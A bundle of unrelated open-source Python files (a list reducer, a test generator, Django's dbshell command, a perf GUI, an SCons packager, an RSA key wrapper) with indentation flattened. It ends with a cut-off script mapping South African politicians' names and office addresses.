# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import task_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
xwu/swift | utils/bug_reducer/bug_reducer/list_reducer.py | 12 | 7332 | from __future__ import print_function
import random
TESTRESULT_NOFAILURE = "NoFailure"
TESTRESULT_KEEPSUFFIX = "KeepSuffix"
TESTRESULT_KEEPPREFIX = "KeepPrefix"
TESTRESULTS = set([TESTRESULT_NOFAILURE, TESTRESULT_KEEPSUFFIX,
TESTRESULT_KEEPPREFIX])
class ListReducer(object):
"""Reduce lists of objects. Inspired by llvm bugpoint"""
def __init__(self, lst):
self.target_list = lst
# Maximal number of allowed splitting iterations,
# before the elements are randomly shuffled.
self.max_iters_without_progress = 3
# Maximal number of allowed single-element trim iterations. We add a
# threshold here as single-element reductions may otherwise take a
# very long time to complete.
self.max_trim_iterations_without_back_jump = 3
self.shuffling_enabled = True
self.num_iters_without_progress = 0
self.mid_top = 0
self.max_iters = self.max_iters_without_progress
def _reset_progress(self):
self.max_iters = self.max_iters_without_progress
self.num_iters_without_progress = 0
def run_test(self, prefix, suffix):
raise RuntimeError("Abstract method")
def _should_continue(self, result):
if result == TESTRESULT_KEEPPREFIX:
# We are done, we have the base case and the base case fails.
if len(self.target_list) == 1:
return {'should_continue': False, 'result': True}
else:
# There is an error, and we can narrow it down further.
return {'should_continue': True, 'result': None}
if result == TESTRESULT_KEEPSUFFIX:
raise RuntimeError("ListReducer internal error: Selected empty "
"set!")
raise RuntimeError('Unknown test result: %s' % result)
def _test_shuffle_slow_converging_list(self):
if not self.shuffling_enabled or \
self.num_iters_without_progress <= self.max_iters_without_progress:
return
print("*** Testing shuffled set...")
shuffled_list = list(self.target_list)
random.shuffle(shuffled_list)
# TODO: Is this correct? I guess we are always doing something.
self.num_iters_without_progress = 0
# Check that the random shuffle does not lose the bug.
(result, _, _) = self.run_test(shuffled_list, [])
if result != TESTRESULT_KEEPPREFIX:
# If we fail here, disable any further shuffling...
self.shuffling_enabled = False
print("*** Shuffling hides the bug...")
return
self.mid_top = len(shuffled_list)
self.max_iters = self.max_iters + 2
print("*** Shuffling does not hide the bug...")
self.target_list = shuffled_list
def _test_prefix_suffix(self, mid, prefix, suffix):
(result, prefix, suffix) = self.run_test(prefix, suffix)
if result == TESTRESULT_KEEPSUFFIX:
# The property still holds. We can just drop the prefix
# elements, and shorten the list to the "kept" elements.
self.target_list = suffix
self.mid_top = len(self.target_list)
# Reset the progress threshold
self._reset_progress()
return False
if result == TESTRESULT_KEEPPREFIX:
# The predicate still holds, shorten the list to the prefix
# elements.
self.target_list = prefix
self.mid_top = len(self.target_list)
self._reset_progress()
return False
assert(result == TESTRESULT_NOFAILURE)
# The property does not hold. Some of the elements we removed must
# be necessary to maintain the property.
self.mid_top = mid
self.num_iters_without_progress = \
self.num_iters_without_progress + 1
return False
def _trim_target_list(self):
self.mid_top = len(self.target_list)
self.max_iters = self.max_iters_without_progress
# Binary split reduction loop
while self.mid_top > 1:
# If the loop doesn't make satisfying progress, try shuffling.
# The purpose of shuffling is to avoid the heavy tails of the
# distribution (improving the speed of convergence).
self._test_shuffle_slow_converging_list()
# Split the list into a prefix, suffix list and then run test on
# those.
mid = self.mid_top / 2
if not self._test_prefix_suffix(mid, self.target_list[:mid],
self.target_list[mid:]):
# If we returned false, then we did some sort of work and there
# was not an error, so continue.
continue
# Otherwise, the test routine signaled an error, so return True to
# signal error.
return True
# If we reach this point, return False, we have no further work we can
# do.
return False
def _trim_try_backjump_and_trim_suffix(self):
backjump_probability = 10
if len(self.target_list) <= 2:
return False
changed = True
trim_iters = 0
# Trimming loop
while changed:
changed = False
# If the binary split reduction loop made an unfortunate sequence
# of splits, the trimming loop might be left off with a huge
# number of remaining elements (large search space). Backjumping
# out of that search space and attempting a different split can
# significantly improve the convergence speed.
if random.randint(0, 100) < backjump_probability:
return True
# Check interior elements, using an offset to make sure we do not
# skip elements when we trim.
offset = 0
for i in range(1, len(self.target_list) - 1):
real_i = i + offset
test_list = self.target_list[real_i:]
(result, prefix, suffix) = self.run_test([], test_list)
if result == TESTRESULT_KEEPSUFFIX:
# We can trim the list!
self.target_list = test_list
offset = offset - 1
changed = True
if trim_iters >= self.max_trim_iterations_without_back_jump:
return False
trim_iters = trim_iters + 1
def reduce_list(self):
random.seed(0x6e5ea738) # Seed the random number generator
(result, self.target_list, kept) = self.run_test(self.target_list, [])
assert(result in TESTRESULTS)
(should_continue, result) = self._should_continue(result)
if not should_continue:
return result
# Now try to trim the list.
should_backjump = True
while should_backjump:
# If self._trim_target_list returns True, then we failed to
# reduce. Bail!
if self._trim_target_list():
return False
# Finally decide if we should back_jump
should_backjump = self._trim_try_backjump_and_trim_suffix()
# There are some failure and we've narrowed them down
return True
| apache-2.0 |
dhananjay92/servo | tests/wpt/web-platform-tests/html/tools/update_html5lib_tests.py | 125 | 5358 | import sys
import os
import hashlib
import urllib
import itertools
import re
import json
import glob
import shutil
try:
import genshi
from genshi.template import MarkupTemplate
from html5lib.tests import support
except ImportError:
print """This script requires the Genshi templating library and html5lib source
It is recommended that these are installed in a virtualenv:
virtualenv venv
source venv/bin/activate
pip install genshi
cd venv
git clone git@github.com:html5lib/html5lib-python.git html5lib
cd html5lib
git submodule init
git submodule update
pip install -e ./
Then run this script again, with the virtual environment still active.
When you are done, type "deactivate" to deactivate the virtual environment.
"""
TESTS_PATH = "html/syntax/parsing/"
def get_paths():
script_path = os.path.split(os.path.abspath(__file__))[0]
repo_base = get_repo_base(script_path)
tests_path = os.path.join(repo_base, TESTS_PATH)
return script_path, tests_path
def get_repo_base(path):
while path:
if os.path.exists(os.path.join(path, ".git")):
return path
else:
path = os.path.split(path)[0]
def get_expected(data):
data = "#document\n" + data
return data
def get_hash(data, container=None):
if container == None:
container = ""
return hashlib.sha1("#container%s#data%s"%(container.encode("utf8"),
data.encode("utf8"))).hexdigest()
def make_tests(script_dir, out_dir, input_file_name, test_data):
tests = []
innerHTML_tests = []
ids_seen = {}
print input_file_name
for test in test_data:
if "script-off" in test:
continue
is_innerHTML = "document-fragment" in test
data = test["data"]
container = test["document-fragment"] if is_innerHTML else None
assert test["document"], test
expected = get_expected(test["document"])
test_list = innerHTML_tests if is_innerHTML else tests
test_id = get_hash(data, container)
if test_id in ids_seen:
print "WARNING: id %s seen multiple times in file %s this time for test (%s, %s) before for test %s, skipping"%(test_id, input_file_name, container, data, ids_seen[test_id])
continue
ids_seen[test_id] = (container, data)
test_list.append({'string_uri_encoded_input':"\"%s\""%urllib.quote(data.encode("utf8")),
'input':data,
'expected':expected,
'string_escaped_expected':json.dumps(urllib.quote(expected.encode("utf8"))),
'id':test_id,
'container':container
})
path_normal = None
if tests:
path_normal = write_test_file(script_dir, out_dir,
tests, "html5lib_%s"%input_file_name,
"html5lib_test.xml")
path_innerHTML = None
if innerHTML_tests:
path_innerHTML = write_test_file(script_dir, out_dir,
innerHTML_tests, "html5lib_innerHTML_%s"%input_file_name,
"html5lib_test_fragment.xml")
return path_normal, path_innerHTML
def write_test_file(script_dir, out_dir, tests, file_name, template_file_name):
file_name = os.path.join(out_dir, file_name + ".html")
short_name = os.path.split(file_name)[1]
with open(os.path.join(script_dir, template_file_name)) as f:
template = MarkupTemplate(f)
stream = template.generate(file_name=short_name, tests=tests)
with open(file_name, "w") as f:
f.write(stream.render('html', doctype='html5',
encoding="utf8"))
return file_name
def escape_js_string(in_data):
return in_data.encode("utf8").encode("string-escape")
def serialize_filenames(test_filenames):
return "[" + ",\n".join("\"%s\""%item for item in test_filenames) + "]"
def main():
script_dir, out_dir = get_paths()
test_files = []
inner_html_files = []
if len(sys.argv) > 2:
test_iterator = itertools.izip(
itertools.repeat(False),
sorted(os.path.abspath(item) for item in
glob.glob(os.path.join(sys.argv[2], "*.dat"))))
else:
test_iterator = itertools.chain(
itertools.izip(itertools.repeat(False),
sorted(support.get_data_files("tree-construction"))),
itertools.izip(itertools.repeat(True),
sorted(support.get_data_files(
os.path.join("tree-construction", "scripted")))))
for (scripted, test_file) in test_iterator:
input_file_name = os.path.splitext(os.path.split(test_file)[1])[0]
if scripted:
input_file_name = "scripted_" + input_file_name
test_data = support.TestData(test_file)
test_filename, inner_html_file_name = make_tests(script_dir, out_dir,
input_file_name, test_data)
if test_filename is not None:
test_files.append(test_filename)
if inner_html_file_name is not None:
inner_html_files.append(inner_html_file_name)
if __name__ == "__main__":
main()
| mpl-2.0 |
meletakis/collato | lib/python2.7/site-packages/django/core/management/commands/dbshell.py | 329 | 1243 | from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db import connections, DEFAULT_DB_ALIAS
class Command(BaseCommand):
help = ("Runs the command-line client for specified database, or the "
"default database if none is provided.")
option_list = BaseCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database onto which to '
'open a shell. Defaults to the "default" database.'),
)
requires_model_validation = False
def handle(self, **options):
connection = connections[options.get('database')]
try:
connection.client.runshell()
except OSError:
# Note that we're assuming OSError means that the client program
# isn't installed. There's a possibility OSError would be raised
# for some other reason, in which case this error message would be
# inaccurate. Still, this message catches the common case.
raise CommandError('You appear not to have the %r program installed or on your path.' % \
connection.client.executable_name)
| gpl-2.0 |
djmax81/android_kernel_samsung_exynos5433_LL | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | 5411 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r ,g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
| gpl-2.0 |
shizhai/wprobe | build_dir/host/scons-2.1.0/build/lib.linux-i686-2.7/SCons/Tool/packaging/src_tarbz2.py | 21 | 1757 | """SCons.Tool.Packaging.tarbz2
The tarbz2 SRC packager.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/packaging/src_tarbz2.py 5357 2011/09/09 21:31:03 bdeegan"
from SCons.Tool.packaging import putintopackageroot
def package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Tar']
bld.set_suffix('.tar.bz2')
target, source = putintopackageroot(target, source, env, PACKAGEROOT, honor_install_location=0)
return bld(env, target, source, TARFLAGS='-jc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| gpl-2.0 |
geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/third_party/tlslite/tlslite/utils/openssl_rsakey.py | 200 | 4670 | # Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
"""OpenSSL/M2Crypto RSA implementation."""
from .cryptomath import *
from .rsakey import *
from .python_rsakey import Python_RSAKey
#copied from M2Crypto.util.py, so when we load the local copy of m2
#we can still use it
def password_callback(v, prompt1='Enter private key passphrase:',
prompt2='Verify passphrase:'):
from getpass import getpass
while 1:
try:
p1=getpass(prompt1)
if v:
p2=getpass(prompt2)
if p1==p2:
break
else:
break
except KeyboardInterrupt:
return None
return p1
if m2cryptoLoaded:
class OpenSSL_RSAKey(RSAKey):
def __init__(self, n=0, e=0):
self.rsa = None
self._hasPrivateKey = False
if (n and not e) or (e and not n):
raise AssertionError()
if n and e:
self.rsa = m2.rsa_new()
m2.rsa_set_n(self.rsa, numberToMPI(n))
m2.rsa_set_e(self.rsa, numberToMPI(e))
def __del__(self):
if self.rsa:
m2.rsa_free(self.rsa)
def __getattr__(self, name):
if name == 'e':
if not self.rsa:
return 0
return mpiToNumber(m2.rsa_get_e(self.rsa))
elif name == 'n':
if not self.rsa:
return 0
return mpiToNumber(m2.rsa_get_n(self.rsa))
else:
raise AttributeError
def hasPrivateKey(self):
return self._hasPrivateKey
def _rawPrivateKeyOp(self, m):
b = numberToByteArray(m, numBytes(self.n))
s = m2.rsa_private_encrypt(self.rsa, bytes(b), m2.no_padding)
c = bytesToNumber(bytearray(s))
return c
def _rawPublicKeyOp(self, c):
b = numberToByteArray(c, numBytes(self.n))
s = m2.rsa_public_decrypt(self.rsa, bytes(b), m2.no_padding)
m = bytesToNumber(bytearray(s))
return m
def acceptsPassword(self): return True
def write(self, password=None):
bio = m2.bio_new(m2.bio_s_mem())
if self._hasPrivateKey:
if password:
def f(v): return password
m2.rsa_write_key(self.rsa, bio, m2.des_ede_cbc(), f)
else:
def f(): pass
m2.rsa_write_key_no_cipher(self.rsa, bio, f)
else:
if password:
raise AssertionError()
m2.rsa_write_pub_key(self.rsa, bio)
s = m2.bio_read(bio, m2.bio_ctrl_pending(bio))
m2.bio_free(bio)
return s
def generate(bits):
key = OpenSSL_RSAKey()
def f():pass
key.rsa = m2.rsa_generate_key(bits, 3, f)
key._hasPrivateKey = True
return key
generate = staticmethod(generate)
def parse(s, passwordCallback=None):
# Skip forward to the first PEM header
start = s.find("-----BEGIN ")
if start == -1:
raise SyntaxError()
s = s[start:]
if s.startswith("-----BEGIN "):
if passwordCallback==None:
callback = password_callback
else:
def f(v, prompt1=None, prompt2=None):
return passwordCallback()
callback = f
bio = m2.bio_new(m2.bio_s_mem())
try:
m2.bio_write(bio, s)
key = OpenSSL_RSAKey()
if s.startswith("-----BEGIN RSA PRIVATE KEY-----"):
def f():pass
key.rsa = m2.rsa_read_key(bio, callback)
if key.rsa == None:
raise SyntaxError()
key._hasPrivateKey = True
elif s.startswith("-----BEGIN PUBLIC KEY-----"):
key.rsa = m2.rsa_read_pub_key(bio)
if key.rsa == None:
raise SyntaxError()
key._hasPrivateKey = False
else:
raise SyntaxError()
return key
finally:
m2.bio_free(bio)
else:
raise SyntaxError()
parse = staticmethod(parse)
| gpl-3.0 |
mysociety/pombola | pombola/south_africa/data/constituencies_and_offices/source_data/convert_to_import_json.py | 5 | 42555 | # *-* coding: utf-8
# Converts constituency files received from parties to the json format
# suitable for import. The intention is to minimise manual editing,
# although this is unavoidable.
# For ANC files the major change made is remove PLOs (Parliamentary
# Liason Officers) of ministers as they are understood to be government,
# not party officials and there is no clear way to include them in
# Pombola at present (although this should be addressed in the future).
# Other parties' processed files have been manually restructured into
# the structure seen by this script.
# This script should be updated for each set of data received.
# Last updated: January 2015.
import distutils.spawn
from subprocess import check_output
import re
import json
import csv
from django.core.exceptions import ImproperlyConfigured
def ensure_executable_found(name):
if not distutils.spawn.find_executable(name):
raise ImproperlyConfigured("Can't find executable '{0}' which is needed by this code".format(name))
manual_name_corrections = {
u'Morutoa Rosalia Masefele Story': u'Masefele Rosalia Morutoa',
u'Mike Masutha': u'Michael Masutha',
u'Sibongiseni Mchunu': u'Sibongile Mchunu',
u'Omie Singh': u'Aumsensingh Singh',
u'Nathi Nhleko': u'Nkosinathi Nhleko',
u'Zet Luzipho': u'Sahlulele Luzipho',
u'Nonzwakazi Swartbooi': u'Gloria Nonzwakazi Swartbooi-Ntombela',
u'Emmanuel Kebby Maphotse': u'Kebby Maphatsoe',
u'Dipuo Letsatsi': u'Dipuo Bertha Letsatsi-Duba',
u'Thoko Didiza': u'Angela Thokozile Didiza',
u'Koena Mmanoko Elisabeth Masehela': u'Elizabeth Koena Mmanoko Masehela',
u'Ishmael Kgetjepe': u'Maaria Ishmael Kgatjepe',
u'Clara Dikgale': u'Masefako Clarah Dikgale',
u'Sheila Sithole-Shope': u'Sheila Coleen Nkhensani Shope-Sithole',
u'DD Mabuza': u'David Dabede Mabuza',
u'Pat Sibande': u'Mtikeni Patrick Sibande',
u'Timothy Khoza': u'Timothy Zanoxolo Matsebane Khoza',
u'Simon P Skhosana': u'Piet Simon Skhosana',
u'Friedah Nkadimeng': u'Mogotle Friddah Nkadimeng',
u'Cathy Dlamini': u'Landulile Cathrine Dlamini',
u'Vusi R. Shongwe': u'Vusumuzi Robert Shongwe',
u'Dudu Manana': u'Duduzile Promise Manana',
u'Thandi B Shongwe': u'Blessing Thandi Shongwe',
u'Rosinah Semenye': u'Machwene Rosina Semenya',
u'Pinky Phosa': u'Yvonne Nkwenkwezi Phosa',
u'Busi Coleman': u'Elsie Mmathulare Coleman',
u'Jabu Mahlangu': u'Jabulani Lukas Mahlangu',
u'Rhodah Mathebe': u'Rhoda Sazi Mathabe',
u'Motlashuping Msosa': u'Tekoetsile Consolation Motlashuping',
u'Tumi Moiloa': u'Boitumelo Theodora Moiloa',
u'Jeanette Nyathi': u'Ntebaleng Jeannete Nyathi',
u'Johni Steenkamp': u'Johanna Steenkamp',
u'Leon Basson': u'Leonard Jones Basson',
u'Manuel Simao De Freitas': u'Manuel Simão Franca De Freitas',
u'Anroux Johanna Marais': u'Anroux Johanna Du Toit Marais',
u'Elizabeth Van Lingen': u'Elizabeth Christina Van Lingen',
u'Belinda Bozzoli (Van Onselen)': u'Belinda Bozzoli',
u'Philly Mapulane': u'Mohlopi Phillemon Mapulane',
u'Kenny Mmoiemang': u'Mosimanegare Kenneth Mmoiemang',
u'Natasha Elsbe Louw': u'Elsabe Natasha Louw',
u'Fana Mokoena': u'Lehlohonolo Goodwill Mokoena',
u'Modikela Mathloko': u'Abinaar Modikela Matlhoko',
u'Mpho Ramakatsa': u'Ramakaudi Paul Ramakatsa',
u'Veronica Mente-Nqweniso': u'Ntombovuyo Veronica Nqweniso',
u'Asanda Matshobane': u'Asanda Matshobeni',
u'Zwelivelile Mandlesizwe Dalibhunga': u'Zwelivelile Mandlesizwe Dalibhunga Mandela',
u'Jacob Marule': u'Marule Otto Jacob',
u'Jack Matlala': u'Matlala Jack Lesiba',
u'Regina Mhawule': u'Makgabo Reginah Mhaule',
u'David Dube': u'Boy David Dube',
u'Hlomane Chauke': u'Hlomane Patrick Chauke',
u'Zoleka Capa-Langa': u'Zoleka Capa',
u'Henro Kruger': u'Hendrika Johanna Lodiwika Kruger',
u'Bob Mabaso': u'Xitlhangoma Mabasa',
u'Mtsi Alfred': u'Skuta Alfred Mtsi',
u'VV Windvoel': u'Victor Vusumuzi Zibuthe Windvoël',
u'Suzan Dantjie': u'Sussana Rebecca Tsebe',
u'Vauda': u'Younus Cassim Vawda',
u'Basson, Catherine': u'Catherine Basson',
u'Feni, Hegrico': u'Hegrico Feni',
u'Jack, Sizwe': u'Sizwe Jack'
}
manual_location_corrections = {
'48 Chaplain Street, Ngqeleni, 5140 (R63, Port St Johns Road)': 'Ngqeleni',
'Kuyga Comm. Hall, Green bushes, 6390': 'Greenbushes, Port Elizabeth, Eastern Cape',
'Nyandeni Municipality, Libode Town Hall, 5160': 'Libode',
'1 Main Street, Wilton Mkwayi Street, Middle drift, 5685(opposite SAPS)': 'SAPS, Middledrift',
'56 Marius Street Adelaide': 'Adelaide',
'206 Old OK Building, Ratlou Location, Thabanchu 9781': 'Thaba Nchu',
'57 Gemabok Avenues, 1st Floor Twin Cnr, Lenasia 1820 ': '57 Gemsbok Avenue, Lenasia',
'56 Kruger Street, Forum Building, Bronkhorspruit, 1020': '56 Kruger Street, Bronkhorstspruit',
'Office B59, Centurion Town Council, Cnr Rabie & Basen Rd, Liyleton, 0157': 'Cnr Rabie Road & Basen Road, Liyleton, 0157',
'99 8th Avenue, Cnr Alfred Nzo Street, Alexandra Multipurpose Centre, Alexandra,': '99 8th Ave, Alexandra, 2014',
'5th Floor Masa House, 12 New South Street, Gandhi Square, Mashalltown, 2001': '12 New South Street, Mashalltown, 2001',
'Mini Munitoria Cnr Mgadi & Komane, Attridgeville,0008': 'Cnr Mgadi & Komane, Attridgeville, 0008',
'Upper Floor 22 President Street, Focheville, 2515': '22 President Street, Fochville, 2515',
'2nd Floor Office, No. 6, 28 Charmachael 2nd Floor Office, No. 6, 28 Charmachael': ' Carmichael Street, Ventersdorp, 2710 South Africa',
'Shop No. 23 Corner De Kock Street, Sanlaam Centre, 8600': ' De Kock Street Vryburg 8600',
'524 Main Road, Caltex Service Station, Senwabarwana, 0740': 'Blouberg Local Municipality, Limpopo',
'Shop No 8 Nelson Mandela Street, City Square, Shop No 8 Nelson Mandela Street, City Square,': ' Nelson Mandela Street Lichtenburg 2740',
'Shop 10 Roma Centre, Racing Park, Killaney, 7441': '-33.813884,18.534536',
'Kaebetse Trading, 189 Groblersdall Road, Monsterlus,0470': '189 Groblersdall Road, Monsterlus, 0470',
'463 Belvedere & Beatrix Street, Acadia, 0083': '463 Belvedere Street, Arcadia, Pretoria 0083',
'DUMBERTON HOUSE 4TH FLOOR CHURCH STREET': '4th Floor Dumberton House, Church Street, Cape town, 8001 South Africa',
'771 Bombay Road, Truro Centre, Old Housing Offices, PMBurg, 3201': '771 Bombay Road, Pietermaritzburg 3201',
'78 De Korte & De Beer Strts, Mineralia Bld, Braamfontein': '78 De Korte & De Beer Streets, Mineralia Bld, Braamfontein, 2000',
'17 Arbee Drive, Office 1 MP Centre, Tongaat, 4068': 'Arbee Drive,Tongaat, 4068',
'No. 23 Indian Shopping Complex, Salamat, No. 23 Indian Shopping Complex, Salamat,': 'Bloemhof, Lekwa-Teemane Local Municipality, North West 2662',
'608,26 brown St Kakholo building': 'Brown St, Nelspruit, 1201 South Africa',
'Office 6A, Bushbuckridge, Shopping Complex, 1280': 'Bushbuckridge, Shopping Complex, 1280',
'Phesheya Kwenciba': 'Butterworth, 4960 South Africa',
'12 Chestnut Crescent, A M Centre, Marianhill, 3610': 'Chestnut Crescent, Marianhill, Durban 3610',
'Office No 26, Civic Centre Building, Malamulele Main Road, 0950': 'Civic Centre Building, Malamulele Main Road, 0950',
'138 Old Mutual Building, Unit F, Lebowakgomo, 0703': 'Cnr R518 and R517 Lebowakgomo, Limpopo ',
'Cnr Voortrekker & Main Street, Sancam Building, 8460': 'Cnr Voortrekker & Main Street, Kuruman, 8460',
'Community Hall Centre, Thembisa Section, Daantjie, 1200': 'Daantjie, 1200',
'SB Farrow': 'East London, 5201 South Africa',
'No. 1 Ebfin Centre, George Street, Athlone, 7766': 'George Street, Athlone, 7766',
'Cnr Geriet & Marietz Streets, No 5 Old Cnr Geriet & Marietz Streets, No 5 Old': 'Gerrit Maritz St Zeerust 2865',
'NY1, FAWO Building, Gugulethu, 7750': 'Gugulethu, 7750',
'18 Vryburg Road, Molopo, Tosca, 8618': 'Tosca, North West, South Africa',
'0ffice no 8,Khula Ntuli Building,Kwaggafontein,0458': 'Khula Ntuli Building Kwaggafontein,0458',
'Lohatla': 'Postmasburg',
'Shop no 22 GHL .Building Main Street Mkhuze 3965': 'Main Street Mkhuze 3965',
'Engen Garage, Vleischboom, 1658': 'Makhuduthamaga Local Municipality',
'Room 19 Balebogeng Centre, Tsoeu Street, Mamelodi West, 0122': 'Mamelodi West, Pretoria 0122',
'Shop 4, Indian Centre, Amalia Road, Shop 4, Indian Centre, Amalia Road,': 'Mamusa Local Municipality Schweizer-Reneke 2780',
'No.1 Mapela Stand, Metsotamia, Mapela, 0610': 'Mapela, Limpopo 0610',
'Stand No.22294, Mohlalaotwane Village, Ga-Rakgodi, 1068': 'Marblehall, Limpopo',
'1117 Farm 1, Superintendent Buildng, Mathabe Street, Mbibane, 0449': 'Mbibane, 0449',
'OGS Building Centre, Room 141, Corner Street, 4th Avenue Town Centre, 7785': 'Mitchell\'s Plain, 7785',
'Corner Gelead and Knobel Road, Ceres Moletjie, 0774': 'Moletji village, Limpopo 0774',
